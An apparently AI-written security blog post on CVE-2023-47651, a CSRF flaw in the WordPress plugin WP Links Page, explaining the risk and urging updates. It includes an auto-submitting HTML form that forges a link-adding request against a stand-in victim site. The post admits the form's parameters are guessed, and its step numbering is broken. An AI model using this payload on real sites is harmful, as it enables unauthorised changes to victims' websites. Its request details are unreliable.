CVE CyberSecurity Database News

CVE-2023-47651 - Cross-Site Request Forgery (CSRF) in WP Links Page – Exploit & Insights

Poster -

---

Summary:
A recent security flaw, tracked as CVE-2023-47651, was discovered in the popular WordPress plugin WP Links Page (developed by Robert Macchi). This Cross-Site Request Forgery (CSRF) vulnerability affects versions all the way up to 4.9.4. Here’s an easy-to-follow breakdown of what this means, how attackers can exploit it, and what you should do.

Before we dig into details, let’s explain what CSRF is

*Cross-Site Request Forgery (CSRF)* happens when a bad actor tricks a logged-in user into performing actions they didn’t intend – like changing settings or updating information – by submitting requests that seem legit to the website.

About WP Links Page

WP Links Page is a plugin that lets website owners display and manage their web links. It’s fairly popular, so an exploit for this plugin can impact lots of WordPress sites.

The Problem

From an unknown version up to 4.9.4, WP Links Page lacks nonce verification (a basic WordPress security measure) in certain admin actions. This means anyone can create a CSRF attack for actions like editing or deleting links, as long as the victim is logged into the admin dashboard, even as a low-level user.

Real-World Risk

An attacker might create a convincing link or page. If an admin (or other logged-in user) visits the malicious page, without knowing it, they trigger unwanted changes on their actual site.
For example: A link can be added, updated, or deleted without permission.

Here’s a simple code snippet attackers could use to exploit this flaw

Suppose the target site is https://victimsite.com. The goal is to add a new link to WP Links Page.

<form action="https://victimsite.com/wp-admin/admin.php?page=wp-links-page&action=add" method="POST" id="csrf_form">
    <input type="hidden" name="link_name" value="Malicious Link">
    <input type="hidden" name="link_url" value="https://attacker.com">;
    <input type="hidden" name="link_description" value="Evil link added via CSRF!">
</form>
<script>
  document.getElementById('csrf_form').submit(); // auto-submit when page loads
</script>

If a logged-in admin visits a page with this code, the link will be silently created on their website.

Note: The real parameters you’d want to post would depend on WP Links Page’s internals – you can tweak them by reviewing the plugin’s PHP code or by inspecting the real form on the admin screen.

Attacker creates an HTML page as shown above.

2. The attacker tricks the WordPress admin into visiting the page (via email, social media, or another website).
3. When the admin visits, their browser sends a POST request to their own WordPress site, adding (or changing) a link as chosen by the attacker.

Recommendations

1. Update Immediately: Upgrade WP Links Page to a version above 4.9.4 (check plugin changelog). If unsure, deactivate the plugin.

Access Controls: Always restrict access to your admin dashboard.

4. Review Nonce Usage: If you build plugins, use WordPress nonces to prevent CSRF.

Official References & Sources

- WPScan Advisory: CVE-2023-47651
- NVD – CVE-2023-47651
- WP Links Page Plugin

Conclusion

*CSRF vulnerabilities*, like CVE-2023-47651, are easy for attackers but just as easy to prevent. If you use WP Links Page, update your plugin ASAP and keep your WordPress site and plugins current at all times. This small habit protects against a world of headache and keeps your users, your brand, and your content safe.

Stay secure! 🚨

*Exclusive post, written for your security awareness by AI. Please share if you find this useful — and always update your software!*

Timeline

Published on: 11/18/2023 22:15:08 UTC
Last modified on: 11/27/2023 20:34:25 UTC